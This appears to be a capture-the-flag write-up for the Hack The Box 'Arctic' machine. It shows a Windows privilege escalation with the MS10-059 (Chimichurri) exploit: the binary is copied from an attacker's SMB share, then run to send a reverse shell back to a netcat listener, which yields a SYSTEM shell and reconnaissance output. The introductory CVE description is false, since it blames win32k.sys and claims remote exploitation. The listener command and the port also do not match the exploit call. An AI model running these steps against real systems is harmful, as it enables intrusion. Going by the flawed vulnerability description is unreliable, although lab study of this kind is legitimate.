CVE-2010-2554(MS10-059)
The vulnerability allows an attacker to execute arbitrary code with system level privileges by exploiting a flaw in the way the Windows kernel-mode driver handles certain types of memory allocation. This vulnerability can be exploited remotely via a maliciously crafted web page or email attachment, or locally via a malicious application.
The vulnerability exists in the win32k.sys kernel-mode driver, which is responsible for handling certain types of memory allocation and user interface operations. By crafting a specific type of memory allocation request, an attacker can trigger a memory corruption condition that allows them to execute arbitrary code with system level privileges.
exploit(chimichurri.exe)
The exploit was found here
Privilege Escalation
c:\tmp> copy \\10.10.14.5\smb\MS10-059.exe
copy \\10.10.14.5\smb\MS10-059.exe
1 file(s) copied.Transfer the exploit to the target system over SMB
c:\tmp>MS10-059.exe 10.10.14.5 12345Execute the exploit
┌──(kali㉿kali)-[~/…/htb/labs/arctic/kernelbuster]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.11] 49427
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\tmp> whoami
whoami
nt authority\system
c:\tmp> hostname
hostname
arctic
c:\tmp> ipconfig
ipconfig
Windows IP Configuration
ethernet adapter local area connection:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.10.11
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2
tunnel adapter isatap.{79f1b374-ac3c-416c-8812-bf482d048a22}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . :
tunnel adapter local area connection* 9:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . :System Level Compromise